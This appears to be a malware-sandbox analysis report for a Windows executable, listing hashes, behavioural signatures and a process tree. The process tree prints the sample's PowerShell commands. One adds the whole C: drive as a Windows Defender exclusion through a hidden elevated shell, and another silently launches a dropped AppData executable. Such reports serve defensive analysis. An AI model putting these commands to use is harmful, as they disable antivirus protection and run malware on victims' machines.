Resubmissions
09-11-2022 04:21
221109-eyxgyafdcn 109-11-2022 04:08
221109-ep773sfcem 109-11-2022 03:58
221109-ejt39sdeg9 10Analysis
-
max time kernel
32s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09-11-2022 04:21
Static task
static1
Behavioral task
behavioral1
Sample
e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe
Resource
win10v2004-20220812-en
General
-
Target
e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe
-
Size
1.8MB
-
MD5
c233f8e5f9b0441782280bb49b98f415
-
SHA1
ddd3476e9d61fc2d707354da50b490dea8f37721
-
SHA256
e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4
-
SHA512
f5404661a5349fb33e18eb632b12a6df3b7e735346bec08ee6a848375c9d6d71bd846c472bf19eccb34aa407bf16a0e214ca4ebe58f1460d4b10cf4c6fdc153c
-
SSDEEP
49152:j0OB/3taBrb/TMvO90d7HjmAFd4A64nsfJ4ongXG/jpC3Ohz1:/349m
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 952 powershell.exe 952 powershell.exe 952 powershell.exe 1940 powershell.exe 624 powershell.exe 624 powershell.exe 624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 624 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exepowershell.execmd.exepowershell.exedescription pid process target process PID 548 wrote to memory of 952 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 548 wrote to memory of 952 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 548 wrote to memory of 952 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 952 wrote to memory of 1344 952 powershell.exe cmd.exe PID 952 wrote to memory of 1344 952 powershell.exe cmd.exe PID 952 wrote to memory of 1344 952 powershell.exe cmd.exe PID 1344 wrote to memory of 1940 1344 cmd.exe powershell.exe PID 1344 wrote to memory of 1940 1344 cmd.exe powershell.exe PID 1344 wrote to memory of 1940 1344 cmd.exe powershell.exe PID 1344 wrote to memory of 600 1344 cmd.exe fsutil.exe PID 1344 wrote to memory of 600 1344 cmd.exe fsutil.exe PID 1344 wrote to memory of 600 1344 cmd.exe fsutil.exe PID 548 wrote to memory of 624 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 548 wrote to memory of 624 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 548 wrote to memory of 624 548 e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe powershell.exe PID 624 wrote to memory of 1544 624 powershell.exe cmd.exe PID 624 wrote to memory of 1544 624 powershell.exe cmd.exe PID 624 wrote to memory of 1544 624 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe"C:\Users\Admin\AppData\Local\Temp\e6dcf394196b6a305e85eae91e900f9c5d639a51fa11def8503750a3e4d8daa4.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Process cmd \"/k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 1\" -Verb RunAs -WindowStyle hidden -ErrorAction SilentlyContinue"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k powershell Add-MpPreference -ExclusionPath 'C:\' & fsutil file createnew %AppData%\excluded.txt 13⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath 'C:\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\system32\fsutil.exefsutil file createnew C:\Users\Admin\AppData\Roaming\excluded.txt 14⤵PID:600
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Process cmd \"/k start %AppData%\ihwvffsmicqynaxuenpaisstlohgxade.exe\" -WindowStyle hidden"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k start %AppData%\ihwvffsmicqynaxuenpaisstlohgxade.exe3⤵PID:1544
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD595b69c1ee2e7547556a2aa105bb33c31
SHA19a93f33ad95be7bc4cbe13c54201d67ef6c551b5
SHA256907c2d9e87d0a742f5d544477f4471f3904dbe64233ef697807a92a95a9f3072
SHA5125d39bd6a4ef11c4875f95514450d3dbaad5db2c8e3f235fc67195ebf2590c900e2c697b3259a8d1bbf014962837f80304bf55bccd2fda4b14cf85c28fe847f4f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD595b69c1ee2e7547556a2aa105bb33c31
SHA19a93f33ad95be7bc4cbe13c54201d67ef6c551b5
SHA256907c2d9e87d0a742f5d544477f4471f3904dbe64233ef697807a92a95a9f3072
SHA5125d39bd6a4ef11c4875f95514450d3dbaad5db2c8e3f235fc67195ebf2590c900e2c697b3259a8d1bbf014962837f80304bf55bccd2fda4b14cf85c28fe847f4f